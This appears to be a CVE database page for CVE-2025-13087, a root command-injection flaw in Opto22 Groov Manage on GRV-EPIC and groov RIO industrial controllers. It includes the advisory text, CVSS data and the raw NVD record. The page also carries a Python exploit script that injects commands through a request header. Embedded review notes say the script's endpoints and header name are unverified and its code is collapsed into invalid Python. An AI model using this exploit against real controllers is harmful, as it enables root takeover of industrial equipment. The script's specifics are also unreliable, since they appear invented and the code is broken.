Security Vulnerability Report
CVE-2025-13087 CVSS 6.2 MEDIUM

CVE-2025-13087

Published: 2025-11-20 22:15:54
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability exists in the Opto22 Groov Manage REST API on GRV-EPIC and groov RIO Products that allows remote code execution with root privileges. When a POST request is executed against the vulnerable endpoint, the application reads certain header details and unsafely uses these values to build commands, allowing an attacker with administrative privileges to inject arbitrary commands that execute as root.

CVSS Details

CVSS Score (v3.1 base)
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L
The raw record below also carries a CVSS v4.0 vector scored 7.5 (HIGH); the headline 6.2 MEDIUM is the v3.1 score.

Configurations (Affected Products)

No configuration data available.

Opto22 Groov Manage REST API (all versions prior to vendor patch)
GRV-EPIC firmware versions with vulnerable REST API implementation
groov RIO firmware versions with vulnerable REST API implementation

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# NOTE(review): the login/command endpoint paths and the injected header name used below do not appear in the advisory text or the raw record on this page (which give only CWE-78, a POST endpoint and "certain header details"); treat them as unverified.
# NOTE(review): the listing has been collapsed onto one line, so everything after the first '#' is a comment and the text as shown is not syntactically valid Python.
#!/usr/bin/env python3 # CVE-2025-13087 PoC - Opto22 Groov Manage REST API RCE # Requires administrative credentials import requests import sys import urllib3 urllib3.disable_warnings() def exploit_groov_rce(target_url, username, password, cmd): """ Exploit CVE-2025-13087: RCE via unsafe header parsing in Groov Manage REST API Args: target_url: Base URL of the Groov Manage device (e.g., https://192.168.1.100) username: Administrative username password: Administrative password cmd: Command to execute on the target system Returns: Response from the exploited endpoint """ login_url = f"{target_url}/api/v1/auth/login" exploit_url = f"{target_url}/api/v1/system/command" # Step 1: Authenticate and obtain session token session = requests.Session() login_payload = { "username": username, "password": password } try: login_resp = session.post(login_url, json=login_payload, verify=False, timeout=10) if login_resp.status_code != 200: print(f"[-] Authentication failed: {login_resp.status_code}") return None token = login_resp.json().get('token') if not token: print("[-] No token received from authentication endpoint") return None print(f"[+] Authentication successful, token: {token[:20]}...") # Step 2: Exploit the RCE via malicious header injection # The vulnerable endpoint reads header values and uses them unsafely in command construction headers = { 'Authorization': f'Bearer {token}', 'X-Command-Header': f';{cmd};#', # Command injection payload 'Content-Type': 'application/json' } exploit_payload = { "action": "execute", "target": "system" } exploit_resp = session.post(exploit_url, json=exploit_payload, headers=headers, verify=False, timeout=10) print(f"[+] Exploit request sent") print(f"[+] Response Status: {exploit_resp.status_code}") print(f"[+] Response: {exploit_resp.text}") return exploit_resp except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: {sys.argv[0]} 
<target_url> <username> <password> <command>") print(f"Example: {sys.argv[0]} https://192.168.1.100 admin admin123 'id'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] command = sys.argv[4] exploit_groov_rce(target, user, pwd, command)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13087", "sourceIdentifier": "[email protected]", "published": "2025-11-20T22:15:54.310", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in the Opto22 Groov Manage REST API on GRV-EPIC and groov RIO Products that allows remote code execution with root privileges. When a POST request is executed against the vulnerable endpoint, the application reads certain header details and unsafely uses these values to build commands, allowing an attacker with administrative privileges to inject arbitrary commands that execute as root."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.7, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-324-03.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-324-03", "source": "[email protected]"}, {"url": "https://www.opto22.com/support/resources-tools/knowledgebase/kb91326", "source": "[email protected]"}]}}